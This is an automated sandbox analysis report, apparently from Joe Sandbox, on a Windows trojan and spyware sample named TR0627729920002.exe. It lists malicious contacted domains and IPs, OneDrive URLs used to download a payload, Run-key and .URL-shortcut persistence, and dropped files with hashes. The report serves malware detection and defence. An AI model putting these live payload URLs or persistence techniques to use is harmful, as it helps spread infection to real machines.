                                  		unknown
                                  www.empireapothecary.com
                                  		154.55.180.56
                                  		truetrue
                                    		unknown
                                    www.meigsbuilds.online
                                    		209.17.116.163
                                    		truetrue
                                      		unknown
                                      www.gografic.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        2q5ira.ph.files.1drv.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.naturathome.info
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.6111.site
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.wellkept.info
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.forummind.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  onedrive.live.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    www.designgamagazine.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.kidsfundoor.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.choonchain.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.shopwithtrooperdavecom.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.huangse5.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.nutricognition.com
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                http://www.trisuaka.xyz/uj3c/true
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.nomaxdic.com/uj3c/true
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1false
                                                                  		high
                                                                  https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1false
                                                                    		high
                                                                    www.nutricognition.com/uj3c/true
                                                                    • Avira URL Cloud: malware
                                                                    		low
                                                                    https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2Ifalse
                                                                      		high

                                                                      URLs from Memory and Binaries

                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://onedrive.live.com/2AJwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2Jwjxmakrv.exe, 0000000E.00000002.354269896.0000000003598000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://2q5ira.ph.files.1drv.com/dKJwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfBJwjxmakrv.exe, 0000000E.00000003.319396319.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://onedrive.live.com/kJwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTaJwjxmakrv.exe, 00000008.00000003.290900186.00000000008CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://2q5ira.ph.files.1drv.com/Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xBJwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.296621597.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.289435198.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.325315312.000000000090C000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.317690202.0000000000900000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.nomaxdic.comrundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV51Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6IbJwjxmakrv.exe, 0000000E.00000003.316208412.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://2q5ira.ph.files.1drv.com/9Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://onedrive.live.com/Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.emerge.deDVarFileInfo$TR0627729920002.exe, Jwjxmakrv.exe.0.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		low
                                                                                              https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPJwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                81.169.145.158
                                                                                                		naturathome.infoGermany
                                                                                                		6724STRATOSTRATOAGDEtrue
                                                                                                198.54.117.218
                                                                                                		parkingpage.namecheap.comUnited States
                                                                                                		22612NAMECHEAP-NETUSfalse
                                                                                                154.55.180.56
                                                                                                		www.empireapothecary.comUnited States
                                                                                                		174COGENT-174UStrue
                                                                                                13.107.43.12
                                                                                                		l-0003.l-dc-msedge.netUnited States
                                                                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                13.107.43.13
                                                                                                		l-0004.l-dc-msedge.netUnited States
                                                                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                5.183.8.187
                                                                                                		www.trendiddas.comGermany
                                                                                                		64463INTERXSCHtrue
                                                                                                188.114.97.3
                                                                                                		www.trisuaka.xyzEuropean Union
                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                156.226.60.131
                                                                                                		www.moneytaoism.comSeychelles
                                                                                                		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                                                34.102.136.180
                                                                                                		nutricognition.comUnited States
                                                                                                		15169GOOGLEUSfalse
                                                                                                38.54.163.57
                                                                                                		www.nomaxdic.comUnited States
                                                                                                		174COGENT-174UStrue
                                                                                                2.57.90.16
                                                                                                		kidsfundoor.comLithuania
                                                                                                		47583AS-HOSTINGERLTtrue
                                                                                                209.17.116.163
                                                                                                		www.meigsbuilds.onlineUnited States
                                                                                                		55002DEFENSE-NETUStrue

                                                                                                Private

                                                                                                IP
                                                                                                192.168.2.1

                                                                                                General Information

                                                                                                Joe Sandbox Version:35.0.0 Citrine
                                                                                                Analysis ID:680563
                                                                                                Start date and time: 08/08/202220:11:072022-08-08 20:11:07 +02:00
                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                Overall analysis duration:0h 12m 49s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:light
                                                                                                Sample file name:TR0627729920002.exe
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                Number of analysed new started processes analysed:46
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:2
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • HDC enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.expl.evad.winEXE@23/8@36/13
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 50%
                                                                                                HDC Information:
                                                                                                • Successful, ratio: 100% (good quality ratio 86.9%)
                                                                                                • Quality average: 71.7%
                                                                                                • Quality standard deviation: 33.4%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 74%
                                                                                                • Number of executed functions: 0
                                                                                                • Number of non-executed functions: 0
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Adjust boot time
                                                                                                • Enable AMSI
                                                                                                • Override analysis time to 240s for rundll32

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                • TCP Packets have been reduced to 100
                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.12, 13.107.42.13
                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, ph-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, odc-ph-files-geo.onedrive.akadns.net, odc-ph-files-brs.onedrive.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                • Execution Graph export aborted for target TR0627729920002.exe, PID 5932 because there are no executed function
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                20:12:06API Interceptor1x Sleep call for process: TR0627729920002.exe modified
                                                                                                20:12:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv C:\Users\Public\Libraries\vrkamxjwJ.url
                                                                                                20:12:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv C:\Users\Public\Libraries\vrkamxjwJ.url
                                                                                                20:12:28API Interceptor2x Sleep call for process: Jwjxmakrv.exe modified
                                                                                                20:15:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
                                                                                                20:15:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI C:\Program Files (x86)\P1bxx\IconCachet0hh.exe

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                No context

                                                                                                Domains

                                                                                                No context

                                                                                                ASNs

                                                                                                No context

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\Public\Libraries\Jwjxmakrv.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):938496
                                                                                                Entropy (8bit):7.259958009937081
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:xnMYEbTjfaxtdqQVESreixHfk1PziiUS1yj:xnp8fs7/k1PLqj
                                                                                                MD5:8DBFE68662123710D83FEF939287D9A3
                                                                                                SHA1:9481EF5498DD490E4EFE83601F916EE48F61E649
                                                                                                SHA-256:663B7BC66499E507CA1F8FAD6E42195A54FE242DB3CC71BF4762952FE04CE5EE
                                                                                                SHA-512:2F3589181A606A3342726B92ECBDF722E43752A281A7E628DE44F142B75BB7150814D515D2C03495F52362106B3F9D8990DE4661E60CF8104F2F5EC6BCD161BC
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X....................@..............................................@...........................0...(..............................0b...........................p......................t7..4............................text............................... ..`.itext.............................. ..`.data...............................@....bss.....7...............................idata...(...0...*..................@....tls....4....`...........................rdata.......p......................@..@.reloc..0b.......d..................@..B.rsrc................\..............@..@....................................@..@................................................................................................

                                                                                                C:\Users\Public\Libraries\Jwjxmakrv.exe:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                C:\Users\Public\Libraries\vrkamxjwJ.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Jwjxmakrv.exe">), ASCII text, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):101
                                                                                                Entropy (8bit):5.111894002506988
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMu3OXssGKd9Z1K9Nvn:HRYFVmTWDyzM8sb9+9Nvn
                                                                                                MD5:A553164F243E721C88BC5F6A0699FD55
                                                                                                SHA1:5F6A7A4F441E430AABE86F2FF147B4C74D84B8EF
                                                                                                SHA-256:970C203850156B46EC573931B26B2C427821439BCA58F7FBF48257CCB5BA4F3E
                                                                                                SHA-512:11CD62E8792A3410D31BD135682718BF33968A97026C19CCEE98D22A5701A8768A4CE4A958E9A8E3B4429C04172B2567A2CBC2DBBC4D2DEC47FAD2957F623276
                                                                                                Malicious:false
                                                                                                Yara Hits:
                                                                                                • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\vrkamxjwJ.url, Author: @itsreallynick (Nick Carr)
                                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\vrkamxjwJ.url, Author: @itsreallynick (Nick Carr)
                                                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Jwjxmakrv.exe"..IconIndex=59..HotKey=74..

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Jwjxmakrvkwfuijrnbpqlslhsyeopao[1]

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):176597
                                                                                                Entropy (8bit):7.830686234749823
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:cjHDWPRtl/liILyOfXNwjptqiI1J6+UJ6JUd1x+FKUPJZ74X018UMrwnW7:mj2ziILpCptqiI1J3CoUd1sKUPJZ74ku
                                                                                                MD5:98840D0581C20BDB663864FEA9208218
                                                                                                SHA1:0195409F121CFAE2B8D3F12E6F986A677AE2B413
                                                                                                SHA-256:99E2BA1CCDBE8DE7176AF71B679B5BCB4436C3BA310FDA0CA2714EDBC3BA0E3A
                                                                                                SHA-512:A76FAD5C68A3D5935E1E3C689D9EBE7E55A403597A21D3DD3AEDC904C031D0ACD4427268A6A35992875F3EAB072E67509ED7A9FBFAECC77B27459D1A62858962
                                                                                                Malicious:false
                                                                                                Preview:ca..y. ..y..&&.y.]._ca.&&.y]...]..y6....>.>(.<,:.*..*8.....6.....,@:2(...>@........<2...6.8>@>2....,@2....0.ca..y. ..y..&&.y.]._ca.&&.y]...]..y.>..4(2..2>.<0.....8.:..:@,6.(6ca..y. ..y..&&.y.]._ca.&&.y]...]..yZ...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRL

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Jwjxmakrvkwfuijrnbpqlslhsyeopao[2]

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):176597
                                                                                                Entropy (8bit):7.830686234749823
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:cjHDWPRtl/liILyOfXNwjptqiI1J6+UJ6JUd1x+FKUPJZ74X018UMrwnW7:mj2ziILpCptqiI1J3CoUd1sKUPJZ74ku
                                                                                                MD5:98840D0581C20BDB663864FEA9208218
                                                                                                SHA1:0195409F121CFAE2B8D3F12E6F986A677AE2B413
                                                                                                SHA-256:99E2BA1CCDBE8DE7176AF71B679B5BCB4436C3BA310FDA0CA2714EDBC3BA0E3A
                                                                                                SHA-512:A76FAD5C68A3D5935E1E3C689D9EBE7E55A403597A21D3DD3AEDC904C031D0ACD4427268A6A35992875F3EAB072E67509ED7A9FBFAECC77B27459D1A62858962
                                                                                                Malicious:false
                                                                                                Preview:ca..y. ..y..&&.y.]._ca.&&.y]...]..y6....>.>(.<,:.*..*8.....6.....,@:2(...>@........<2...6.8>@>2....,@2....0.ca..y. ..y..&&.y.]._ca.&&.y]...]..y.>..4(2..2>.<0.....8.:..:@,6.(6ca..y. ..y..&&.y.]._ca.&&.y]...]..yZ...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRL

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Jwjxmakrvkwfuijrnbpqlslhsyeopao[1]

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):176597
                                                                                                Entropy (8bit):7.830686234749823
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:cjHDWPRtl/liILyOfXNwjptqiI1J6+UJ6JUd1x+FKUPJZ74X018UMrwnW7:mj2ziILpCptqiI1J3CoUd1sKUPJZ74ku
                                                                                                MD5:98840D0581C20BDB663864FEA9208218
                                                                                                SHA1:0195409F121CFAE2B8D3F12E6F986A677AE2B413
                                                                                                SHA-256:99E2BA1CCDBE8DE7176AF71B679B5BCB4436C3BA310FDA0CA2714EDBC3BA0E3A
                                                                                                SHA-512:A76FAD5C68A3D5935E1E3C689D9EBE7E55A403597A21D3DD3AEDC904C031D0ACD4427268A6A35992875F3EAB072E67509ED7A9FBFAECC77B27459D1A62858962
                                                                                                Malicious:false
                                                                                                Preview:ca..y. ..y..&&.y.]._ca.&&.y]...]..y6....>.>(.<,:.*..*8.....6.....,@:2(...>@........<2...6.8>@>2....,@2....0.ca..y. ..y..&&.y.]._ca.&&.y]...]..y.>..4(2..2>.<0.....8.:..:@,6.(6ca..y. ..y..&&.y.]._ca.&&.y]...]..yZ...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRLR^....`L^.b..\.Z...R.Rd.P`V.f.fT....Z.....`LV^d..bRL.......P^...Z.TRL

                                                                                                C:\Users\user\AppData\Local\Temp\DB1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.792852251086831
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe

                                                                                                Download File
                                                                                                Process:C:\Windows\explorer.exe
                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):232960
                                                                                                Entropy (8bit):6.429241692577143
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:d6QAoDVAgvnElWG910GD9s0fd4jNAPjGDi9J0m+l:dbDVP4WA10GpsCd4jNOGiir
                                                                                                MD5:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                SHA1:502285D9914448259E73B18843B088FE972841D6
                                                                                                SHA-256:3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
                                                                                                SHA-512:79487FEFEAB94DB6FD72B302B04DF8191E5158B5A57595EFB86825D2EA55944925E1572FC3B8101D7C6B20738BD0E857850D9BDBD91811018063D28FE6636BDD
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./.B.AGB.AGB.AGK..G..AG-.BFD.AG-.EFU.AGB.@G`.AG-.@FG.AG-.DFK.AG-.OFj.AG-.GC.AG-.CFC.AGRichB.AG........................PE..L...M.z;.............................o............@..................................)....@..................................................................`..d%...3..T...........................x.......................|...`....................text............................... ..`.data...@...........................@....idata..8$.......&..................@..@.didat..@...........................@....rsrc...............................@..@.reloc..d%...`...&...h..............@..B........................................................................................................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.259958009937081
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                                                • InstallShield setup (43055/19) 0.43%
                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                File name:TR0627729920002.exe
                                                                                                File size:938496
                                                                                                MD5:8dbfe68662123710d83fef939287d9a3
                                                                                                SHA1:9481ef5498dd490e4efe83601f916ee48f61e649
                                                                                                SHA256:663b7bc66499e507ca1f8fad6e42195a54fe242db3cc71bf4762952fe04ce5ee
                                                                                                SHA512:2f3589181a606a3342726b92ecbdf722e43752a281a7e628de44f142b75bb7150814d515d2c03495f52362106b3f9d8990de4661e60cf8104f2f5ec6bcd161bc
                                                                                                SSDEEP:24576:xnMYEbTjfaxtdqQVESreixHfk1PziiUS1yj:xnp8fs7/k1PLqj
                                                                                                TLSH:AE15BEF6E68104F3CC22953BCD0AAD59E13A7E642E2CD54B6BE43EDC4B745C0381B59A
                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                File Icon

                                                                                                Icon Hash:18db1ccadc5c5b18

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x46e790
                                                                                                Entrypoint Section:.itext
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
